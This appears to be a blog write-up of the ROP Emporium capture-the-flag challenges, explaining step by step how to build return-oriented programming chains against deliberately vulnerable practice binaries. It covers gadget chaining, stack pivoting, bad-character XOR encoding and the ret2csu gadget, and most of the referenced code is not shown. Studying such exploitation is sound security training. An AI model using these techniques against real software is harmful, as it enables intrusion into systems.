ROP Emporium is a series of challenges desired to introduce fundamental return-oriented programming (ROP) techniques. Whenever a buffer overflow vulnerability but the stack has its NX bit on (i.e., you cannot execute data on stack), ROP allows us to chain existing snippets of instructions (so-called gadgets) in the program image to achieve what we want. I will be using GDB + pwndbg and pwntools for the write-up. Although not necessary, I also use debuginfod for GNU libc debug information. You can also find the complete Python scripts for each challenge here. After the first challenge, I will omit the code for finding the offset of stored RIP and sending the payload since they are the same.
Before You Start
If you haven’t yet, consider reading the beginners’ guide on the ROP Emporium website first to get a taste of common tools and techniques for ROP.
ret2win
ret2win is a simple buffer overflow challenge with a twist.
Investigation
Let’s check out the binary in gdb first with gdb ret2win
:
There are no protections in this challenge except NX, which means that we have to use ROP.
The main function simply prints messages and calls pwnme()
pwnme()
is a bit longer. We can see that at the beginning of the function (<+8>
), only 0x20
bytes are allocated for the buffer. Later pwnme()
uses read()
to prompt for input, which does not check the input size and is vulnerable to buffer overflow.
Taking a quick look in radare reveals that there is a ret2win()
function that we should return to.
In case you need a refresher on the stack layout, here’s how our buffer overflow attack will look like on the stack: the input will overwrite the buffer and saved rbp with garbage values and set the return address of pwnme()
to ret2win()
(0x400756
in the image).
Build the Payload
We are now ready to craft the payload, which consists of padding (garbage values for buffer and saved rbp on stack) and the return address. To find the exact number of characters needed for the padding (the “offset”), we can use cyclic
from pwntools to generate a de Bruijn sequence and use cyclic -l
(or cyclic_find()
in Python) to calculate the offset from captured rip.
We found a segfault
Crash the program with a cyclic
pattern:
We found the offset pattern:
In the disassembly, we can see that we have set the return address to 0x6161616c6161616b
using the cyclic sequence. We only need the first 4 bytes to find the offset, which for little endian, is 0x6161616b
, since the least significant bytes are put first.
This process of finding the offset can be automated using pwnlib (pwntools) in Python. Here’s the relevant code borrowed from GitHub:
To build the payload, we can use p64()
to pack address as 64-bit little-endian pointer:
Alternatively, pwnlib provides a convenient function flat()
for building payloads, which automatically calls cyclic_find()
and packs addresses for you. Note that elf.symbols.<symbol>
gives the PLT address, not the actual runtime address.
Stack Alignment
For now we can save the payload to a file and check if it works in gdb:
Turns out it doesn’t:
Here we can see the infamous movaps
instruction:
RSP is not 16-byte aligned:
From the screenshots above we see that the payload did work, but the program crashed at the movaps
instruction. With a quick search we find that movaps
requires the stack pointer to be 16-byte aligned (must end in 0x0). We can quickly fix this by adding another address before ret2win()
address, since the address is an 8-byte pointer and we are 8 bytes off. To ensure that no side effects are produced, we can use a ret
gadget in the binary (a gadget is a continuous set of instructions that ends in ret
, jmp
, call
, etc so that you can chain multiple of them together to do what you want). The ret
gadget will do nothing other than just popping the next address on the stack into RIP.
ropper -f ret2win
:
Our updated payload with the addition of the ret
gadget:
Our payload works:
Automated Exploitation
While we could just write the payload to a file and send it to the program through stdin, it does get a bit annoying when you are testing things. From now on, we can keep writing the file for debugging purposes but use pwnlib’s utilities to start a process. As we have already done this when automating the offset-finding process, this will look pretty much the same:
You can view the complete script here.
split
Call system()
The pwnme()
method can be exploited the same way with a buffer overflow.
pwnme()
decompilation:
We don’t have a simple ret2win()
function anymore, but the program does import system()
from libc, which can be used to print the flag.
Function list in radare2:
Simply returning to system()
wouldn’t work, since it requires a command as an argument. In x86-64, arguments are passed through registers (more information here). The first argument is stored in rdi, so we just need to find a gadget to set rdi. Looking at ropper output, we find pop rdi; ret;
which does exactly what we want. To use the gadget, simply add the gadget address to the payload followed by the data to be popped.
Setter gadget in ropper
:
We still need the actual string. Fortunately, the challenge binary already contains the string /bin/cat flag.txt
in the .data
section:
Command string found in split
:
Payload & Solution
We can use the same code to find the offset for the return address. After some quick testing, we find that this binary also suffer from the same movaps stack alignment issue, which can be resolved with a ret
gadget. In addition, instead of using the address of the command string from rabin2
output, we can use pwnlib’s builtin search function to make the code a bit more readable. Note that pwnlib has builtin ROP tools, but I prefer sticking to flat()
since in future challenges we won’t be able to find straight-forward gadgets anymore.
We are now ready to feed the program our payload:
View the complete solution here.
callme
The callme challenge requires us to callme three functions (callme_{one,two,three}()
) in sequence and pass the same three arguments to each (0xdeadbeefdeadbeef
, 0xcafebabecafebabe
, 0xd00df00dd00df00d
), which basically means that we need to find gadgets that let us modify three registers used for passing arguments. You can find the complete solution below.
Which Registers?
We have the same buffer overflow vulnerability in pwnme()
.
As for the function calls, we can open libcallme.so
in gdb to check what arguments the functions accept and from which registers. The three registers used in order are rdi, rsi, and rdx.
Building the Payload
Run ropper -f callme
and we find a convenient gadget that sets all three registers at once:
Since the arguments will be popped off the stack in order, the payload is simple:
- popper gadget
- argument 1 (
0xdeadbeefdeadbeef
) - argument 2 (
0xcafebabecafebabe
) - argument 3 (
0xd00df00dd00df00d
) callme_one()
- popper gadget
- argument 1 (
0xdeadbeefdeadbeef
) - argument 2 (
0xcafebabecafebabe
) - argument 3 (
0xd00df00dd00df00d
) callme_two()
- popper gadget
- argument 1 (
0xdeadbeefdeadbeef
) - argument 2 (
0xcafebabecafebabe
) - argument 3 (
0xd00df00dd00df00d
) callme_three()
To build the payload:
View the complete code here.
write4
For write4, we have to find print the flag using the print_file()
function from the shared object, however this time the binary doesn’t just contain a "flag.txt"
out of no where. We will have to write the gadget to memory ourselves. The code for exploiting pwnme()
and sending the payload is the exact same as the one we used before.
Write Gadget
We need a write gadget that lets us write bytes somewhere in memory so that we can pass that address to the print function. We know from the challenge page that a write gadget generally looks like mov [dest_reg], src_reg
, where we write the value in src_reg
to an address in dest_reg
. Let’s start looking for them in ropper output.
Found a write gadget:
Popper to use with the write gadget:
write8
With the gadget we found we can easily write the entirety of the argument ("flag.txt"
, 8 bytes = 64 bits) into memory. The next question is where. One of the most reliable options is the .data
section (I tried the stack and it didn’t work), where global and static variables are kept.
.data
is writable and large enough:
Here’s the payload:
View the complete code here.
badchars
In badchars
, we find that not all bytes are acceptable as input. To bypass the badchars, we need to configure the ROP chain finder and also encode the filename using XOR then decode it in memory.
It’s XORing Time
Finding bad chars:
Using ropper with badchars option (hex-encoded):
Encoders like shikata ga nai uses many techniques to avoid bad characters, but for our purposes we can just use plain XOR. Time to find some xor
gadgets:
I can’t find pop rdx
, so I guess we are stuck with the first XOR gadget.
With these, we can control the first XOR gadget:
Here we find a write gadget:
We can use this to set print_file()
’s argument (rdi):
One approach to avoiding the bad chars is to XOR the data ("flag.txt"
) with a single byte in the payload and XOR the data against the same byte in our ROP chain. While doing so, we have to make sure that everything in the ROP chain are badchar-free, meaning that we need to find the right key through trial-and-error. Since the our gadget XORs one byte at a type, we need eight iterations for the entirety of the filename.
Building Payload with a Loop
This took me quite some time to get right, but basically I had to shift the string address and try different keys to get the filename to decode correctly.
View the complete code here.
fluff
For fluff we have to combine some random instructions to get a write gadget.
where gadgets
Hmm. Nothing useful here.
Let’s check out the hint:
So we have some gadgets that are not so straightforward. After reading the documentation for xlat, bextr, and stos, we find that they can indeed be combined to create a write gadget:
bextr rbx, rcx, rdx
- We can use this to set
rbx
for the next gadget,xlat
. - Bits are extracted from
rcx
(2nd operand) torbx
(1st operand). - We need to subtract
0x3ef2
to offset theadd
instruction at<+4>
- Lower 8 bits (
dl
) ofrdx
(3rd operand) is treated as the bit index, and the next 8 bits (dh
) specify the length of the bit vector. - We can basically set
rdx[7:0]
to 0 andrdx[15:8]
to 64 in order to simulatemov rbx, rcx
.
xlat byte ptr [rbx]
(xlatb
)
- This uses
al
to index a table at[rbx]
and copy a byte toal
. Basicallymov al, byte ptr [rbx + al]
. - We need to find an address that has the byte we need to write. This address is equal to
rbx + al
. - As for setting the source address, we could zero
al
, but we don’t have enough space (only 0x200) formov eax, 0
gadgets. - We actually don’t need to zero
al
since we know the initial value ofrax
(return value ofputs("Thank you!")
which is0xb
). - Save
al
after each write. For future calls,al
will be the last byte we wrote to memory. - Now that we know the value of
al
, we can just subtract lastal
value fromrbx
(rcx
) for each call. If our desired byte is ataddr
, thenrbx = addr - al
andrbx + al == addr
.
stos byte ptr [rdi], al
(stosb byte [rdi], al
)
- This is equivalent to
mov byte ptr [rdi], al
. - We use this in conjunction with
xlat
to achieve write-what-where.
Craft the Write Gadget
…And Build the Payload
Building the payload is pretty trivial now that we have the write-bytes gadget.
View the complete code here.
pivot
For pivot we have to make two payloads, one for the stack and the other for the heap.
Why do we need to pivot?
While the pivot
binary artificially creates the demand, there are oftentimes situations in which we may not have enough space on the stack to put all of our ROP chain without messing the buffer overflow up. If we somehow leak a heap address from the vulnerable program and write there, it is possible to pivot to the heap and put the rest of the payload there.
How do I pivot?
To pivot, simply set the rsp
to the heap address you got so that instructions such as pop
and ret
now take values from the heap.
How do I ret2win()
?
The basic idea is to load the GOT entry of foothold_function()
and add an offset to get ret2win()
. Finding the address of GOT entry can be done through rabin2 -R pivot
.
You can determine the offset between foothold_function()
and ret2win()
in gdb.
pivot
does not import ret2win()
:
We can determine the function address difference at runtime:
Notice how GDB doesn’t need the GOT to give you the addresses? Since foothold_function()
isn’t called during normal program flow, GDB probably calculated these addresses.
Alternatively, determine function address difference using shared library:
Exploiting
To set rsp
, we use the xchg
gadget to swap rsp
and rax
. The first thing we do after we reach the heap ROP chain is go to foothold_function()
to update its GOT entry. Then we do what we have to do to load the GOT entry address, add an offset to it to get to ret2win()
, and then call it.
View the complete code here.
ret2csu
In ret2csu
we are given a universal gadget to call the ret2win()
function with arguments. For more details on the gadget, see ret2csu.
Universal Gadget
I was pretty lost trying to find suitable gadgets, so naturally I read the last paragraph on the challenge page, which hints at us that there is a “universal ROP” gadget in __libc_csu_init
. It is called “universal” since every program linked against glibc will contain this gadget. The csu
(“C Start-Up”) functions help libc set up programming language features (like constructors, transactional memory model, etc). When a C program starts, __libc_csu_init
gets called first to set things up, then main()
, and finally __libc_csu_fini
to tear things down (see __libc_csu_init). Let’s take a look at the gadget:
We can see that using instructions at <+64>
and <+67>
we can set the rdx
and rsi
registers indirectly through r15
and r14
, which we also have control over (<+96>
). One thing is that this gadget only lets us set edi
which doesn’t fit an entire argument, but we easily can find a pop rdi; ret
gadget elsewhere. There are, however, two real issues with this gadget that can be fixed with a bit of planning.
- We have to give
call
at<+73>
an address that contains the address of a gadget that does not affectrdx
orrsi
. So the gadget’s address has to be stored in the binary somewhere for us to use it. This practically limits us to pre-existing symbols in the binary. - We have to make sure that
rbp
andrbx
is equal, otherwise the gadget will jump somewhere else at<+84>
.
Issue One
To solve issue one, we would have to find a gadget that both has minimal side effects and whose address is stored in the program image itself. One candidate is the _fini
symbol:
Pwnlib will help us find a location containing the address of _fini
in the binary:
We have to make sure that r12 + rbx * 8 == _fini
for the call
instruction. r12 = _fini
and rbx = 0
will work.
Issue Two
Since we control rbp
(<+91>
), we can easily bypass the jne
instruction by setting rbp
to the anticipated value of rbx
. Knowing that we set rbx
to zero and <+77>
increments rbx
by one, we can just set rbp
to 1.
Bringing everything together
Our payload will start at <+90>
to set up the registers we need, after which we ret
to <+64>
to set up the arguments for ret2win()
. After bypassing the jne
we encounter a add rsp, 0x8
which is equivalent to a pop
, so we need to add a garbage value in the payload. We then find ourselves back in the same place we set up all the registers, but this time we just have to give them garbage values to reach the ret
. Remember that with this gadget we only get to set edi
, so we need to ret
to a pop rdi; ret
gadget. Now that all three argument registers are initialized properly, we can ret
to ret2win()
. The payload is as follows:
View the complete code here.